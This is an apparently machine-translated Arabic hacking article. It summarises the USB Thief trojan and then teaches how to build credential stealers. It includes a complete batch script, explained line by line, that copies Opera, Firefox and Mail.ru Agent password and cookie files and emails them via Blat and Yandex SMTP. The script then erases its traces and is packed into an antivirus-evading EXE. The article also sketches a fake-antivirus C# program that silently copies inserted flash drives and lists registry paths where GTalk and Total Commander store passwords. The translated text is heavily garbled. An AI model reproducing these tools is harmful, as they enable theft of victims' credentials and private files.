أبسط محرك أقراص فلاش غرابر. Trojan USB Thief لا يترك آثارا ويعمل على محركات أقراص فلاش كيفية سرقة البيانات من خلال محرك أقراص فلاش USB وسجل
ترويان غير عادي للغاية: استلم مالوار اسم لص USB (Win32 / PSW.Stealer.nai). يركز MalName على سرقة البيانات، وهو ينطبق ويعمل على محركات الأقراص الفلاش العادية، وكذلك تخفي مهارة آثار وجودها في النظام. Troyan مثالية للهيدراء الإلكتروني، لأنه قادر على الوصول إلى المعزول من أنظمة الشبكات، إذا كنت تستطيع توصيل محرك أقراص USB إليهم.
على عكس تهديدات USB الأخرى المكتوبة في اختصارات التلقيح التلقائي والتطبيقات المزيفة بحيث يتم بدء تشغيل Malwar، يعمل لص USB على خلاف ذلك. تم تصميم عمل Trojan لحقيقة أن المستخدمين غالبا ما يتم تخزينهم في فلاش محركات الأقراص المحمولة من هذه التطبيقات مثل Firefox أو Notepad ++ و TrueCrypt وما إلى ذلك. Malwar جزءا لا يتجزأ بدقة في سلسلة من تنزيل هذه البرامج، وإصدار نفسه للحصول على مساعد أو ملف dll.وبعد وبالتالي، عندما يطلق المستخدم التطبيق المعتاد من محرك الأقراص المحمول، جنبا إلى جنب معه (في وضع الخلفية) يدير ترويان وتشغيلها.
مؤلف غير معروف من مالفيفا سوء حماية جدية لتنميته. يرتبط لص USB مع كل محرك أقراص فلاش مصاب باستخدام معرفه الفريد ومعلمات محرك الأقراص. يتم حماية جزء من ملفات Trojan بواسطة تشفير AES128، مع الناتج عن المفتاح على وجه التحديد على أساس المعلمات الفريدة للجهاز. أيضا، تقوم أسماء ملفات Malvari بالاحتجاج في كل حالة: يتم إنشاؤها على أساس محتويات FlashPlay والوقت لإنشاء ملفات. عند محاولة نسخ لص USB إلى محرك أقراص فلاش آخر أو عادي hDDلن يعطي نظام الحماية من المرحلة من مرحلتين مالفاري لكسبه، ويعقد أيضا بجدية تنفيذ عكس الهندسة.
هيكل طروادة.
يعمل لص USB مباشرة من محرك أقراص فلاش ولا يترك أي أثر في النظام نفسه. يتكون Troyan من ستة ملفات، أربعة منها قابلة للتنفيذ، واثنين آخرين تحتوي على بيانات التكوين. أول محمل مسؤول عن إطلاق طروادة جنبا إلى جنب مع إصدار محمول من أي برنامج. إنه يتحقق جهاز USB ويتأكد من أنه يمكن تسجيل معلومات مسروقة عليه وتخزينه هنا. ثم يبدأ التحميل الثاني. إنه يتحقق من أسماء العمليات الأصل وتأكد من أنه يعمل في بيئة مشتركة (ولا أحد يحاول تحليله). التحميل الثالث، بدوره، يتحقق من وجود نظام مكافحة الفيروسات.
آخر، بايلاد الرابع، وهو مدمج في العملية الجارية، هو المسؤول مباشرة عن سرقة البيانات. Usb Thief Kidnaps Documents، الصور، قائمة الملفات من جميع الأقراص المتاحة وبيانات التسجيل ويندوز المعلومات التي تم جمعها باستخدام Winaudit. يتم حفظ جميع البيانات المسروقة على محرك أقراص فلاش ويتم تشفيرها باستخدام التشفير الإهليلجي.
يلاحظ خبراء ESET أن الهجمات التي تستخدم لص usb لا يمكن أن يسمى الممارسة الشائعة. ومع ذلك، فإن ترويان خطير للغاية، حيث من الصعب اكتشاف وجودها، وبعد استخراج محرك أقراص USB، لا تظل أي آثار لانتخاب المعلومات على الإطلاق. ينص أيضا في تقرير الشركة أيضا على أن مؤلف مالفاري، إذا رغبت في ذلك، يمكن "إعادة التعبئة" الخبيثة، واستبدال الصباغ لسرقة البيانات عن أي مالوار آخر.
في هذه المقالة، سوف أصف بسرعة ودون صعوبة كبيرة، وكتابة ملفات التركيز وجعل الفيروسات مع كلمات المرور وإرسالها كلها على صندوق البريد.
دعنا نبدأ بحقيقة أن الفيروس سيتم كتابة على BAT "E (CMD، يمكنك اتخاذ الأوامر الأساسية) الموجودة في المعتاد ملف نصي وسيتم تنفيذها باستخدام نظام التشغيل القياسي والمدمج في Windows- "سطر الأوامر".
لكتابة فيروس مماثل، تحتاج إلى معرفة موقع التخزين الدقيق لتلك الملفات التي ستسرقها، ومكونات Blat التي يمكن تنزيلها من الموقع خارج الموقع http://www.blat.net/ أو من خادمنا، بالإضافة إلى مكون من WinRAR Archiver Rar.exe (يمكنك الاستغناء عنها).
افتح المفكرة ونسخ الكود التالي هناك:تضمين التضمين @ MD٪ SystemRoot٪ \\ Wincs MD٪ SystemDrive٪ \\ Pass \\ MD٪ SystemDrive٪ \\ Pass \\ Opera \\ MD٪ SystemDrive٪ \\ Pass \\ Mozilla \\ MD٪ SystemDrive٪ \\ Pass \\ MailAgent \\ MD٪ SystemDrive٪ \\ Pass \\ Pass \\ Pass mailAgent \\ reg attrab٪ systemroot٪ \\ wincs + h + s + r atstrib٪ systemdrive٪ \\ pass + h + s + r copy / y "٪ systemroot٪ \\ blat.exe"٪ systemroot٪ \\ wincs \\ blat.exe "copy / y "٪ systemroot٪ \\ blat.dll"٪ systemroot٪ \\ wincs \\ blat.dll "copy / y" systemroot٪ \\ blat.lib ""٪ systemroot٪ \\ wincs \\ blat.lib "cd / d٪ appdata٪ \\ Opera \\ Opera \\ Opera \\ Copy / Y Wand.Dat٪ SystemDrive٪ \\ Pass \\ Opera \\ Wand.Dat Copy / Y Cookies4.dat٪ SystemDrive٪ \\ Pass \\ Opera \\ Cookies4.da Regedit.exe -ea٪ SystemDrive٪ \\ Pass \\ mailAgent \\ reg \\ agent.reg "hkey_current_user \\ software \\ mail.ru \\ agent \\ magent_logins2 regedit.exe -ea٪ systemdrive٪ \\ pass \\ mailagent \\ agent_3.reg" hkey_current_user \\ software \\ mail.ru \\ agent \\ magent_logins3 cd / d٪ appdata٪ xcopy mra \\ base٪ systemdrive٪ \\ pass \\ mailagent / k / k / q / q / r / s / y / e\u003e nul xcopy mra \\ update \\ ver.txt٪ systemdrive٪ \\ pass \\ mailAgent / k / h / g / q / r / s / y\u003e nul cd٪ appdata٪ \\ mozill a \\ firefox \\ shipiles \\ * default \\ copy / y cookies.sqlite٪ systemdrive٪ \\ pass \\ mozilla \\ cookies.sqlite copy.sqlite copy.com key3.db٪ systemdrive٪ \\ pass \\ mozilla \\ key3.db copy copycons.sqlite ٪ systemdrive٪ \\ Pass \\ Mozilla \\ Signons.sqlite copy.sqlite copy / y٪ windir٪ \\ rar.exe٪ systemdrive٪ \\ pass \\ rar.exe\u003e \u200b\u200bnul del / s / q٪ systemroot٪ \\ rar.exe٪ systemdrive٪ \\ Pass \\ Rar.exe A-Rar.exe SystemDrive٪ \\ Pass \\ Pass.rar٪ SystemDrive٪ \\ Pass \\ Pass \\ Y٪ SystemDrive٪ \\ Pass \\ Pass.rar٪ systemroot٪ \\ Wincs \\ Pass.rar CD٪ SystemRoot٪ \\ Wincs ٪ systemroot٪ \\ Wincs \\ Blat.exe -Install -Server -Server SMTP.yandex.ru -Port 587 -F [email protected] -u تسجيل الدخول -PW Password Ren * .RAR Pass.rar٪ SystemRoot٪ \\ Winks \\ Blot.exe Filespassword [email protected] -attach٪ systemroot٪ \\ Wincs \\ Pass.rar rmdir / s / q٪ systemdrive٪ \\ Pass rmdir / s / q٪ systemroot٪ \\ wincs del / s / q٪ systemroot٪ \\ لطخة. exe del / s / q٪ systemroot٪ \\ blot.dll del / s / q٪ systemroot٪ \\ blat.lib attrib + a + s + h + r٪ systemroot٪ \\ wind.exe الخروج cls
ليس كثيرا لكتابة رمز Batinka نفسه.
تضمين التغريد - يخفي الجسم باتينكا (لذلك ليس من الضروري، ولكن لا يزال)
mD٪ SystemRoot٪ \\ Wincs - يخلق مجلد Wincs في مجلد النظام نوافذ بغض النظر عن القرص الذي تم تثبيته أو يتم استدعاؤه.
mD٪ SystemDrive٪ \\ Pass \\ - يقوم بإنشاء مجلد Pass على القرص حيث يتم تثبيت Windows.
mD٪ SystemDrive٪ \\ Pass \\ Opera \\ - ينشئ مجلد Opera حيث سيتم نسخ مجلد في المستقبل باستخدام متصفح Opera (حتى 11 * إصدارات Opera يخزن كلمات المرور الخاصة بك في ملف Wand.dat)
- ينشئ مجلد Mozilla حيث سيتم نسخ الملفات المستقبلية متصفح موزيلا. (cookies.sqlite، key3.db، signons.sqlite) يتم تخزين كلمات المرور التي يتم تخزينها.
mD٪ SystemDrive٪ \\ Pass \\ MailAgent \\ - ينشئ مجلد mailAgent الذي سيتم نسخ الملفات التي تحتوي على محفوظات المراسلات ومفاتيح التسجيل (مفاتيح كلمة المرور) من عامل البريد.
mD٪ SystemDrive٪ \\ Pass \\ MailAgent \\ Reg - يخلق مجلد ريج
attrib٪ SystemRoot٪ \\ Wincs + H + S + R - يضع سمات مجلد Wincs وبالتالي يخفيه من العينين.
attrib٪ SystemDrive٪ \\ Pass + H + S + R - نفس أعلاه.
نسخ / y "٪ systemroot٪ \\ blat.exe"٪ systemroot٪ \\ wincs \\ blat.exe " - نسخ ملف Blat.exe من التفريغ إلى مجلد Wincs
نسخ / y "٪ systemroot٪ \\ blat.dll"٪ systemroot٪ \\ wincs \\ blat.dll " - نسخ ملف Blat.dll من التفريغ إلى مجلد Wincs
نسخ / y "٪ systemroot٪ \\ blat.lib" "٪ systemroot٪ \\ wincs \\ blat.lib" - نسخ ملف Blat.lib من مكان التوصيل في مجلد Wincs
CD / D٪ APPDATA٪ \\ Opera \\ Opera \\ - يدخل مجلد Opera حيث توجد ملفات مع كلمات المرور (وليس فقط) من الأوبرا.
نسخ / y wand.dat٪ systemdrive٪ \\ pass \\ opera \\ wand.dat - نسخ الملف Wand.dat إلى مجلد الأوبرا
نسخ / y cookies4.dat٪ systemdrive٪ \\ pass \\ opera \\ cookies4.dat - نسخ ملف Cookies4.dat إلى مجلد Opera
rEGEDIT.EXE -EA٪ SystemDrive٪ \\ Pass \\ MailAgent \\ Reg \\ Agent.reg "HKEY_CURRENT_USER \\ Software \\ Mail.Ru \\ Agent \\ Magent_logins2 - تصدير مفتاح التسجيل Magent_Logins2 حيث يتم تخزين كلمة المرور في مجلد REG
rEGEDIT.EXE -EA٪ SystemDrive٪ \\ Pass \\ MailAgent \\ Reg \\ Agent.reg "HKEY_CURRENT_USER \\ Software \\ Mail.Ru \\ Agent \\ Magent_logins3 - قم بتصدير مفتاح التسجيل Magent_Logins3 حيث يتم تخزين كلمة المرور في مجلد REG
CD / D٪ AppData٪ - انتقل إلى مجلد AppData
Xcopy MRA \\ Base٪ SystemDrive٪ \\ Pass \\ MailAgent / K / K / H / G / Q / R / S / Y / E\u003e NUL - نسخ محتويات المجلد MRA \\ Base في مجلد MailAgent
xcopy mra \\ update \\ ver.txt٪ systemdrive٪ \\ pass \\ mailAgent / k / k / h / g / q / r / s / y\u003e nul - نسخ ملف ver.txt إلى مجلد mailAgent
cD٪ APPDATA٪ \\ Mozilla \\ Firefox \\ Profiles \\ * الافتراضي \\ - انتقل إلى المجلد باستخدام Prowser Profile Mozilles
نسخة / y cookies.sqlite٪ systemdrive٪ \\ pass \\ mozilla \\ cookies.sqlite - نسخ ملف Cookies.sqlite إلى مجلد Mozilla
نسخ / y key3.db٪ systemdrive٪ \\ pass \\ mozilla \\ key3.db - نسخ ملف Key3.db إلى مجلد Mozilla
نسخ / y signors.sqlite٪ systemdrive٪ \\ pass \\ mozilla \\ signons.sqlite - نسخ ملف SignOns.sqlite إلى مجلد Mozilla
نسخ / y٪ windir٪ \\ rar.exe٪ systemdrive٪ \\ pass \\ rar.exe\u003e \u200b\u200bnul- نسخ مكون ارشفير ينرر. rar.exe في مجلد تمرير
del / s / q٪ systemroot٪ \\ rar.exe - حذف مكون أرشف من مجلد Windows
٪ SystemDrive٪ \\ Pass \\ Rar.exe A -R٪ SystemDrive٪ \\ Pass \\ Pass.rar٪ SystemDrive٪ \\ Pass \\- أرشيف محتويات مجلد تمرير
نسخ / y٪ systemdrive٪ \\ pass \\ pass.rar٪ systemroot٪ \\ wincs \\ pass.rar انسخ الأرشيف الذي تم إنشاؤه في مجلد Wincs
cD٪ SystemRoot٪ \\ Wincs - انتقل إلى مجلد Wincs
٪ systemroot٪ \\ Wincs \\ blat.exe -install -Server SMTP.yandex.ru -Port 587 -F [email protected] -u تسجيل الدخول -pw كلمة المرور - تحضير برنامج Blat لإرسال الأرشيف يشير إلى بيانات الترخيص وإرسال الحروف. لا تنس تحديد بياناتك من صندوق البريد، من حيث سيتم إرسال الرسالة مع الأرشيف.
ren * .ra pass.rar - فقط في حالة، إذا لم يقبل الأرشفة الاسم الخطأ أثناء الدورة التدريبية، فقد قمت بإعادة تسميته لتمرير.
٪ systemroot٪ \\ Wincs \\ blat.exe -body كلمة المرور تسجيل الدخولyandex.ru. -Atch٪ systemroot٪ \\ Wincs \\ pass.rar - حدد العنوان البريدي الذي سيتم إرساله بواسطة الرسالة وإرساله.
rMDIR / S / Q٪ SYSTEMDRIVE٪ \\ PASS - احذف مجلد Pass
rmdir / s / q٪ systemroot٪ \\ wincs - حذف مجلد Wincs
del / s / q٪ systemroot٪ \\ blat.exe
del / s / q٪ systemroot٪ \\ blat.dll - نقوم بإزالة مكونات Blat من مجلد Windows.
del / s / q٪ systemroot٪ \\ blat.lib - نقوم بإزالة مكونات Blat من مجلد Windows.
attrib + a + s + h + r٪ systemroot٪ \\ wind.exe - نضع سمات بالطريقة نفسها تخفي نفسك من العينين.
الخروج - أكمل عملية Batinka والخروج.
cLS - تنظيف إخراج أي صفوف في المنظم.
نسخ، حفظ باسم Wind.BAT وتجميعها في إكس باستخدام برنامج Bat To Exe Converter، ثم نجمع كل شيء في حفنة، وهذا هو، نأخذ مكونات برنامج Blat و WinRAR Archiver مكون (يمكنك التنزيل) والغراء ملف قابل للتنفيذ واحد، أو مع أي برنامج، يجب أن يكون مسار تفريغ كل فالامس٪ Systemroot٪ أو٪ Windowsdir٪ أو٪ windir٪.
نتيجة لذلك، نحصل على فيروس لن يمر بواسطة مكافحة الفيروسات وسوف يرسل أرشيفا مع الملفات إليك في البريد. يمكن فك تشفير الملفات التي ستأتي إلى البريد باستخدام استرداد متعدد الوظائف، ليس كل شيء، ولكن فقط Wand.Dat من Opera ثم إذا لم يتم تحديثه إلى 11 * إصدارات. يمكن فك كافة الملفات الأخرى عن طريق استبدال بنفسك.
في هذا أعتقد أنه يمكنك الانتهاء، إذا كان لديك أي أسئلة، فلا تتردد في طرحها.
شكرا لك على انتباهكم، كل شيء جيد!
© مبادلة TheHeckWorld.in.
للحصول على محركات فلاش مورتال بسيطة - هذا هو جهاز لنقل المستندات / الأفلام / الصور وغيرها من المعلومات الشخصية (والأحيانا الشخصية للغاية). ولكن بالنسبة للمتسللين، يكون محرك الأقراص الفلاش في نفس الوقت ضحية وأداة قتالية. اليوم سأخبرك بجميع التفاصيل الدقيقة من استنزاف البيانات غير الواجب من محركات الأقراص الفلاش إلى جهاز الكمبيوتر الخاص بي، بالإضافة إلى تعليم محركات الأقراص الفلاش غير المستمرة احتياطي النسخ كلمات المرور مع كمبيوتر "كبير".
محركات فلاش كاملة
ستكون فكرة برنامج "شركات الشر الشرير" كما يلي. سنقوم بتطوير أدوات صغيرة تتظاهر بأنها فائقة الفيروسات السوبر ميجا المتقدمة، والغرض منها إزالة النوعية من الفيروسات "الخطيرة" من محركات الأقراص الفلاش. لا أحد لن يفاجئ أي شخص مصاب بالفيروسات المسامحة، لذلك لن يسبب "مكافحة الفيروسات" المتخصص لدينا مخاوف مستخدم السذج. على العكس من ذلك، إدراج محرك أقراص فلاش لك في الكمبيوتر ورؤية نوع الرسالة: "تم اكتشاف فيروس. أقدم فحصا مفصلا لجميع الملفات لوجود المصابين »- سوف ينتظر بالتأكيد الانتهاء من هذه العملية.
إعداد الأدوات
اكتب مثل هذا البرنامج المفيد سنكون في العصرية الآن C #. مرونة اللغة ووظائف النظام الأساسي واسعة. يسمح لك بتطوير تطبيقات مع سرعة البرق. هذا هو ما نحتاجه. نحن مهتمون بالمحصول الذي يمكننا جمعه، وليس عملية الترميز TEDING.
واحدة من المكونات المهمة لتطبيقنا ستكون واجهة. كلما قمت بذلك أكثر صلابة، كلما زادت فرص الضحية لن تلاحظ الخدعة وتتوقع بهدوء إكمال المسح المضاد للفيروسات. لم أكن البخار بشكل خاص ونشر صورة ويقدم في شكل مشروع نظيف. يمكنك الاستفادة من كاملة وجعل تصميم لالتقاط الأنفاس. أنصحك أن ترى تنفيذ بعض مكافحة الفيروسات الحقيقي وحوالي نفس النمط لإصدار طلبك.
وضعنا المهمة
نحن نفترض أننا قررنا القضايا التنظيمية وخوارزمية الإجراءات، حان الوقت لمناقشة الفروق الفنية الفنية. لذلك، يجب أن يبدأ مكافحة الفيروسات لدينا عملهم القذر أثناء تثبيت محرك أقراص فلاش. بمجرد ظهور القرص الجديد في النظام، يجب على برنامجنا تحديد خطابها وبدء النسخ.
قبل أن أتعهد بأكتب هذه المقالة، تم اكتشاف شفرة المصدر لبرنامج مماثل عيني. حدد مؤلف المثال حقيقة وجود محرك أقراص فلاش من خلال الإطفاء الدوري لجميع الأقراص لوجود محرك أقراص نوع "قابل للإزالة". في البداية اعتقدت أن أذهب بنفس الطريقة، لكن الصوت الداخلي اقترح في مجال عقلانية. وجود كل "من أجل" وجميع "حسنا، إنه على"، ألقيت هذه الفكرة وذهب إلى المشي على MSND. بعد خمس دقائق اتضح أنني فعلت ذلك غير عبث. تم العثور على الجواب!
بدون winapi في أي مكان ...
يمكنك معرفة المزيد بكفاءة على توصيل المعدات الجديدة (في محركات الأقراص الخاصة بنا - محركات أقراص فلاش) من خلال اصطياد وتحليل رسالة WM_DEVICECHANGE. أثناء تثبيت الجهاز، يتم إرسال الرسالة إلى جميع النوافذ، يمكننا بسهولة معالجة ذلك في طلبك. لهذا، يكفي فقط لوصف وظيفة WindowProc. في الممارسة العملية، يبدو الأمر كذلك:
LRESult Callback WindowProc (HWND HWND، // uint uMSG معرف نافذة، // WPARAM WPARAM Message Idvices، // الحدث الذي حدث LPARAM LPARAM // المؤشر إلى الهيكل الذي يحتوي على بيانات)
في جسم الوظيفة، تحتاج إلى مقارنة قيمة المعلمة WPARAM مع معرفات من الأحداث المختلفة المتعلقة WM_DEVICECHANGE. مثالنا، سيكون:
حسنا، كيفية إنشاء حقيقة ربط المعدات الجديدة، ونحن نعرف، ولكن كيف نتأكد من توصيل محرك أقراص فلاش؟ الأجهزة ذات إمكانية "اتصال ساخن" (أنا عن USB) مجموعة كبيرة (طابعة، ماسحة ضوئية، مودم، إلخ). لحسن الحظ، وتم حل هذه المشكلة بسيطة للغاية. بواسطة المعلمة LPARAM، يمكننا الرجوع إلى بنية _dev_broadcast_hdr، والتي لديها حقل DBCH_DEVIETYPETYPE. هذا، بناء على القيمة، هذه الحقول، يتم إجراء الاستنتاجات المناسبة. إذا كان مساويا DEV_DEVTYP_VOLUME، ثم الوقت للانضمام وتغلب على يديك - محرك أقراص فلاش متصل بنا!
Typedefly _dev_broadcast_hdr (dbch_size؛ // dword dbch_devicetype حجمها؛ // dword dbch_rived؛ // محفوظة، محفوظة، غير مستعملة) dev_broadcast_hdr، * pdev_broadcast_hdr؛
في بوسنا، أدخل محرك أقراص فلاش، "سنحاول التعرف على خطاب القرص الذي ذهب فيه النظام. كما هو الحال في "مجال المعجزات"، يمكنك تخمينها، ولكن من الأفضل سحب المعلومات من بنية Dev_Broadcast_Volume.
TypeDef prorm _dev_broadcast_volume (dword dbcv_size؛ // dword dbcv_devicetype الحجم؛ // dword dbcv_reserved الجهاز؛ // محفوظة dword dbcv_unitmask؛ // بت قناع محرك الأقراص حرف كلمة dbcv_flags؛ //) dev_broadcast_volume، * pdev_broadcast_volume؛
من بين جميع مجالات هذا الهيكل، نحن مهتمون ب DBCV_UNITMASK. في الاعتبار أن هذه الخاصية تحتوي على أحرف بت فقط، وليس أدائها الرمزي. على سبيل المثال، إذا كانت القيمة 0، فإن حرف محرك الأقراص سيكون؛ إذا 1، ثم ب، إلخ. لراحة الحصول على خطاب حرف، من الأفضل كتابة وظيفة.
إذا كنت تقرأ عنواننا لفترة طويلة ويعرف وظائف API، في قراءة الجزء التالي من المقالة ليست هناك حاجة. افتح المحرر وبدء التطبيق. وصفت جميع الهياكل والوظائف اللازمة؛ يمكنك جمعها في البرنامج. حدد، وسأبدأ في غمر V.NET و C # على وجه الخصوص.
stay.net "OM.
الوقت لممارسة وتطبيق المعرفة إلى لغة C #. "ي للرعونة؟ - أنت تسألك. "قال الأكشاك عن Winapi، ثم قررت فقط بغباء إجراء مكالمة لجميع الوظائف في شكل رمز أصلية؟ أين هي سرعة البرق المعلنة للتنمية؟ ".
في شيء أنت على حق. سوف يستخدم تطبيقنا حقا وظائف Winapi (من الأسهل)، لكننا لن تصفهم. واجه العديد من المطورين مشكلة تحديد محركات أقراص فلاش. نتيجة لهذه الجميلات، بدأت فصول مجانية ل C # في الظهور، حيث تم بالفعل تنفيذ جميع الوظائف اللازمة بالفعل. علينا فقط توصيل مثل هذه الشغل (اقرأ المكون) إلى مشروعك وتسبب زوج من الأساليب. سوف نستخدم واحدة من هذه الفصول الآن. لكن معرفة الهياكل الموصوفة أعلاه، ستكون مفيدة لك عند نقل هذا البرنامج إلى Windows API.
الفصول الجاهزة الفئات الحاسمة مثل هذه المهام، مجموعة كبيرة، لكني أحببت الخيار من جان دوليناي. كتب هذا الشخص سهل الاستخدام وفهم رمز فئة DriveTettector، والتي يمكن:
والأهم من ذلك، مع هذه الفئة من السهل جدا العمل - في هذا تأكد الآن. يتم إجراء اتصال فئة بمشروعك. طريقة قياسية.وليس التوقف بهذا المعنى. لذلك، دعنا نتحرك على الفور إلى التهيئة. يتم ذلك مثل هذا:
FlashDrivetetector \u003d جديد DriveTetector ()؛ flashdrivetetector.devicearrived + \u003d جديد DriveTectorymentherler (OnDriveArrived)؛ flashdrivetetector.deviCeremoved + \u003d جديد driveatectorymentherler (Ondrivemonded)؛
بعد إنشاء مثيل كائن فئة DRIVETTETOR، حدد معالجات الأحداث deviedrived () و driveMoved (). وفقا لاسمهم، ليس من الصعب تخمين ما يجيبون. يتم كتابة جميع رمز التهيئة بشكل أفضل إلى طريقة Form1 (). سيكون الرمز الرئيسي لبرنامجنا في معالج حدث devicearved. سترى نصه على طرق:
String Dirname \u003d Environment.getCommandLineargs () + "Flash_" + DateTime.Now.Tostring ("DD-MM-YY-HH-MM-SS")؛ creativirectory (dirname)؛ Xdirectory FlashCoPier \u003d XDirectory الجديد ()؛ flashcopier.indexcomplete + \u003d indexcompleteeventhandler (indexcompleate)؛ flashcopier.itemcopied + \u003d new itemcopiedeventhandler (Itemcopied)؛ flashcopier.copycomplete + \u003d copycomplesteeventhandler (copycomplete)؛ flashcopier.source \u003d دليل جديد (E.Drive.tostring ())؛ flashcopier.destination \u003d دليل جديد (DIRNAME)؛ flashcopier.overwrite \u003d صحيح؛ flashcopier.folderfilter \u003d "*"؛ flashcopier.filefilters.add ("* doc")؛ flashcopier.filefilters.add ("* xls")؛ // تعريف المرشحات الأخرى // .... flashcopier.startcopy ()؛
في بداية القائمة، سأحدد المسار إلى المجلد الذي سنقوم فيه بنسخ محتويات محرك أقراص Flash. ستكون النسخة في دليل "Flash_Text Date"، الموجود في المجلد الذي يعمل به تطبيقنا أكثر ملاءمة للغاية. اتخاذ قرار مع اسم المجلد، أحاول إنشاءه باستخدام وظيفة Createirectory (). كتبت هذه الميزة حصريا للراحة. يحدث في ذلك مثيل كائن DirectoryInfo، المصمم للعمل مع الدلائل، واستدعاء طريقة إنشاء ()، مما يخلق ملف جديد.
بعد إنشاء مجلد، يمكنك نسخ. سوف نسخ جميع الملفات باستخدام كائن نوع XDirectory. إذا قمت بكتابة الرمز من إدراج نفسك، فعندئذ عند محاولة ترجمة المحول البرمجي، سيقوم المحول البرمجي بإصدار خطأ يتم فيه قول الأسود باللون الأبيض: "كائن هذا النوع غير موجود".
الحقيقة هي أن Xdirectory هي فئة طرف ثالث. مرة واحدة منذ فترة طويلة وجدت ذلك على الإنترنت Ineta ومنذ ذلك الحين غالبا ما أستخدمه في مشاريعي. أحب ذلك في حقيقة أنه يكفي لاستدعاء طريقة واحدة لنسخ المجلدات المستثمرة. بالإضافة إلى ذلك، يسمح لك بتثبيت المرشحات.
حقا تفعل بدونها. نحن نأخذ الطبقات القياسية، المعروفة لجميع أجهزة الاستقبال المبرمجين - العودية - وكتابة بضعة عشر خطوط التعليمات البرمجية. للأسف، أنا لا أريد أن أفعل هذا بشكل قاطع. في ساحة القرن XXI، تحتاج إلى تحسين أفعالك و Xdirectory لمساعدتنا في ذلك.
تكمن الوحدة مع الفئة مع قرصنا، ويمكنك التعرف على الغرض من الأساليب / الخصائص / الأحداث من خلال النظر إلى الجدول المناسب.
خصائص الطبقة XDIRECTION
أساليب الطبقة XDIRECTION
حاول تشغيل تطبيقنا وإدراج محرك أقراص فلاش USB. بعد بضع ثوان (اعتمادا على فصوص محرك الأقراص الفلاش الخاص بك)، انتقلت محتويات محرك أقراص USB بأكملها إلى المجلد الذي قمت بإطلاق تطبيق خبز طازج.
أمسك USB.
الآن فكر في المهمة المعاكسة وتحدث عن فروق الدقوق من إنشاء ما يسمى. flashki grabber. مبدأ خلق نفسه بالضبط. تحتاج إلى كتابة تطبيق بسيط سيبدأ تلقائيا بعد تثبيت محرك الأقراص الفلاش.
أثناء العملية، ستشرح التطبيق من قبل الكلمات الرئيسية التسجيل / الكلمات الرئيسية التي تحفظ فيها البرامج المشهورة كلمات المرور ويمكن نسخها إلى أحد مجلداتها قدر الإمكان. من أجل أن يسبب مدير السيارات الخاص بك شكوك للمستخدم الفقراء، والقلق لإخفاءه جيدا. على سبيل المثال، ضمن قائمة الإطلاق.
من المحتمل أنك تدرك أن النسخة المحمولة المزعومة من التطبيقات أصبحت الآن تحظى بشعبية كبيرة، وهذا هو، يمكن أن تعمل البرامج مباشرة من محرك أقراص فلاش. هذا هو الأفضل للعب. تشكيل برنامج في النمط المناسب وللصدق، ورمي العديد من الأزرار المصممة لتشغيل أي برامج. يتم عرض خيار التصميم الخاص بي في الصورة.
كيف سنرسر؟
سأقول على الفور أن الإجراءات الفائقة المتسللين لا تحتاج إلى القيام به هنا. معظم البرامج تخزن البيانات الشخصية في المستندات والإعدادات \\ user \\ application data \\٪ programname٪ أو في السجل. ضمن اسم البرنامج يعني أي برنامج. إذا صادفت الخيار الأول، فسيتعين عليك الاستفادة من فئة XDirectory المألوفة بالفعل (أو الأساليب القياسية العمل مع الملفات) ونسخ كل ما تحتاجه معه. في الحالة الثانية، سيكون عليك العمل مع السجل. مثال على نسخ الملفات لن تتعامل مع (اعتبرنا بالفعل)، ولكن كيفية التفاعل مع أدوات التسجيل .NET - سأظل الآن (على مثال تحديد المسار إلى مجلد TC):
RegistryKey ReadKey \u003d Registry.currentUser.opensubkey ("البرنامج \\\\ Ghisler \\\\ القائد الكلي.")؛ مفتاح سلسلة \u003d (سلسلة) readkey.getValue (" installdir ")؛
هذا كل شئ. الرمز لن يعد. يجب أن تكون هذه المعرفة كافية لك لسحب الملفات مع معلومات قيمة. لتسهيل المهمة، أعددت قائمة أكثر البرامج الشعبية ورسمت جميع المسارات التي تخزين بيانات المستخدم المحفوظة.
mail.Agent.
Mail.Ru Messenger أصبح الآن تحظى بشعبية كبيرة بين المستخدمين المميتين العاديين (خاصة في الإناث). الأهداف واضحة، يتم تسليم المهام، لذلك نحن مهتمون:
gtalk.
شركة جوجل يخلق منتجات مريحة ووظيفية، من بينها عميل GABBER - gtalk.وبعد اليوم gtalk. لا تحظى بشعبية كبيرة. في كل جهاز كمبيوتر ثاني، لم يتم تثبيته، ولكن في بعض الأحيان لا يزال موجودا وأن يكون في هذا الموضوع، من الأفضل تعليم برنامجنا على الفور للحصول على كلمات مرور ومن هذا المسيحي. كلمات المرور من جميع مخزن حسابات Gtalk في التسجيل - HHEY_CURRENT_USER \\ Software \\ Google \\ Google Talk \\ الحسابات. في هذا الموضوع، يتم سرد جميع الحسابات التي تم بموجبها من أي وقت مضى gtalk.وبعد يتم تسجيل كلمات المرور إلى الحساب في معلمة السلسلة PW.
القائد الكلي.
القائد الكلي. - بالتأكيد، الأكثر شعبية مدير الملفاتوبعد تحتوي الوظائف الموجودة في البرنامج على سيارة تقريبية وعربة صغيرة (وعلى أكبر عدد ممكن منها يمكن تثبيتها على إضافات إضافية). نحن مهتمون فقط في عميل FTP المدمج. يستخدم العديد من كلمات المرور، بالطبع، الاحتفاظ بها.
TC على عكس العديد من البرامج الأخرى لا تخزن كلمات المرور في التسجيل، واستخدام ملفات INI الجيدة القديمة. كلمات المرور، بالإضافة إلى جميع البيانات اللازمة للاتصال بالخوادم (IP، المنفذ، اسم المستخدم، إلخ) القائد الكلي. المتاجر في الملف wCX_FTP.INI.التي تقع ببراءة في مجلد البرنامج. المسار إلى الدليل الذي تم تثبيته القائد الكلي.يمكنك التعلم من السجل. PLOY في The HKEY_CURRENT_USER \\ Software \\ Ghisler \\ Total Commander Branch.
ثعلب النار.
اليوم، فإن المتصفح ليس مجرد برنامج للسفر على شبكة الإنترنت، ولكن يجمع كله، بالإضافة إلى مجموعة متنوعة من الفرص يحتفظ بالكثير من المعلومات السرية. المثال النموذجي هو نموذج ويب. 99٪ من المواقع الحديثة تتطلب التسجيل. تذكر وتتذكر باستمرار في رأسك تسجيل الدخول / كلمة المرور لكل موقع - المهمة غير واقعية، خاصة إذا كنت مستخدم متقدم وتصفح الإنترنت لا تقتصر على "زملاء الدراسة" و "vkontakte" واحد.
سهل المطورون حياة المستخدمين وتضمين ما يسمى بالمستودعات كلمة المرور "في البرامج. لقد قمت بالتسجيل، ذهبت تحت حسابي، أمر المتصفح بتذكر بيانات الاعتماد - ونسيت. في المرة القادمة التي قمت بزيارتها، قم فقط بأداء بضع نقرات باستخدام الماوس، وأنت بالفعل على الموقع. نظرا لأن المتصفح يحتفظ بكلمات المرور، فهذا يعني أن لدينا الفرصة لسحب جميع قاعدتها.
